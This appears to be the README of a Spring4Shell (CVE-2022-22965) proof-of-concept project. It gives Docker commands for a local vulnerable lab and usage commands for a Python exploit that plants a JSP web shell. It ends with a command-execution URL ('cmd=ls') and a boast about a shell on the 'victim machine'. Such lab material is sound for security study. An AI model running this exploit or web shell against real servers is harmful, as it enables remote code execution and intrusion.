This is a proof of concept of an exploit for CVE-2022-22965 (spring4shell) vulnerability. It is composed by:

• A vulnerable Springboot application;
• An exploit script written in python;
• A safe app for test that the exploit doesn't work;
• A dockerfile for running the vulnerable application and test the exploit;

• [:it:] Mario Offertucci;
• [:it:] Antonio Donnarumma.

• Docker: It is used for running a tomcat container with the Springboot application;
• Python: It is used for running the exploit;

Inside the project root folder there is a Dockerfile that creates a tomcat image and copies the vulnerable_app/target/spring4shell.war and safe_app/target/safeapp.war file inside /usr/local/tomcat/webapps folder, so you just have to build the image and start the container.

docker build -t cve_2022_22965 .

docker run -p 8080:8080 -d --name springshell cve_2022_22965

curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

If you see this response

This is Elliot Alderson

Then the application is up and running.

cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

You can optionally specify the injected jsp file name but it is not mandatory. Example

cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

If you don't specify a name a randome one will be generated.

You will see the following in the command shell
After the exploit you can send a command also via HTTP GET request

http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

You have succesfully opened a shell on the victim machine! enjoy